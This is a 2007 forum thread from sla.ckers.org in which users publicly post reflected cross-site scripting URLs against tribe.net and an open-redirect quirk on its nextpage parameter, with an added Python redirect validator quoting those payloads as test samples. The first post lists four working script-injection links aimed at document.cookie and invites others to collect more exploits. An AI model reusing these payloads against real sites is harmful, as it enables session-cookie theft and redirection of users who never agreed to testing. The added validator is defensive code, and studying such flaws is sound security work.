Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Tribe.com (Cisco Owned)
Posted by: digi7al64
Date: March 05, 2007 09:28PM

Cisco has decided to join the social networking arena
http://news.com.com/Cisco+buys+into+social-networking+fray/2100-1033_3-6157797.html

To welcome them on the "scene" here is some reflective XSS.
http://search.tribe.net/?page-size=10&query=%22%3Cscript%3Ealert(document.cookie);%3C/script%3E
http://tribe.net/template/pub%2CChangeLocation.vm?nextpage=%22%20style=%22background:%20url(javascript:alert(document.cookie));%22&scrntemp=pub%2CGlobalFind.vm
http://tribe.net/template/pub%2CChangeLocation.vm?nextpage=%22%20src=%22javascript:alert(document.cookie);&scrntemp=pub%2CGlobalFind.vm
http://tribe.net/template/pub%2CChangeLocation.vm?nextpage=%22%20type=input%20STYLE=%22width:%20expression(alert('XSS'));%22&scrntemp=pub%2CGlobalFind.vm

As you can see, most stuff gets through and I can only imagine how "secure" the actual persistent data is. Perhaps I might join!

Ohhh, please post all your tribe sploits in here. It will be interesting to see how many we can gather.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: Tribe.com (Cisco Owned)
Posted by: rsnake
Date: March 06, 2007 04:39PM

I was amazed when I saw this, but then I saw the quote, "[the company] allows large companies to easily add social-networking features to their Web sites without needing to hire a team of engineers from Stanford to do it."

While I'm not a big fan of building social networking sites, I can get on board with not wanting to hire Stanford grads... hahah... just kidding.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Tribe.com (Cisco Owned)
Posted by: tx
Date: March 23, 2007 05:22AM

The nextpage variable in the links works as a weird redirect. If the URL is http://www.whatever.tld it will replace 'www' with the name of the city the user clicks, (generally) sending the user to http://citysubdomain.whatever.tld.
http://wichita.tribe.net/template/pub%2CChangeLocation.vm?nextpage=http://www.tribe.tk&scrntemp=%22pub%2CNotLoggedIn.vm

If the domain is one letter (i.e. http://x.com) it will simply replace the character (alpha) with the city name.
http://wichita.tribe.net/template/pub%2CChangeLocation.vm?nextpage=http://x.org&scrntemp=%22pub%2CNotLoggedIn.vm

I suppose something like that could have some limited seo value...

EDIT: Actually, the links are javascript, so that kills the seo value.

-tx @ lowtech-labs.org



Edited 2 time(s). Last edit at 03/23/2007 05:25AM by tx.
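
A server-side check for a redirect parameter like the nextpage value discussed in the posts above, as an added example that is not part of the original thread or the site's own code. It accepts only rooted local paths or http(s) URLs on an allowlisted base domain, then HTML-escapes the result for the attribute it is written into; the function names and `ALLOWED_BASE` are assumptions.

```python
import html
from urllib.parse import urlsplit

# Assumption: redirects only ever need to reach the site's own (city) subdomains.
ALLOWED_BASE = "tribe.net"

def safe_nextpage(value, default="/"):
    """Return value if it is a rooted local path or an http(s) URL on
    ALLOWED_BASE or one of its subdomains; otherwise return default."""
    # Whitespace, control characters and backslashes never occur in targets we accept.
    if not value or any(ord(c) <= 0x20 or c == "\\" for c in value):
        return default
    try:
        parts = urlsplit(value)
        host = (parts.hostname or "").lower()
    except ValueError:  # e.g. malformed IPv6 literal
        return default
    if not parts.scheme and not parts.netloc:
        # Local path; "//host" and "///host" are treated as absolute by browsers.
        ok = value.startswith("/") and not value.startswith("//")
        return value if ok else default
    if parts.scheme not in ("http", "https"):
        return default
    if host == ALLOWED_BASE or host.endswith("." + ALLOWED_BASE):
        return value
    return default

def render_link(value):
    """Validate first, then escape for the double-quoted attribute context."""
    return '<a href="%s">continue</a>' % html.escape(safe_nextpage(value), quote=True)

# Decoded nextpage values from the thread, plus constructed ones (marked).
SAMPLES = [
    '" style="background: url(javascript:alert(document.cookie));"',
    "http://www.tribe.tk",
    "http://x.org",
    "//tribe.tk/",                                     # constructed
    "http://wichita.tribe.net/",                       # constructed
    'http://wichita.tribe.net/"onmouseover=alert(1)',  # constructed
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(repr(s), "->", render_link(s))
```

Validation alone is not enough: the last sample passes the host check, so the attribute escaping in `render_link` is what keeps its quote from closing the `href`.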

Re: Tribe.com (Cisco Owned)
Posted by: hackathology
Date: March 30, 2007 03:57AM

hahahhaha, I guess every big corporation gets XSS. Trust me. You can try it on Cisco, Microsoft, Oracle, etc... you will definitely find XSS. Agree?

http://hackathology.blogspot.com
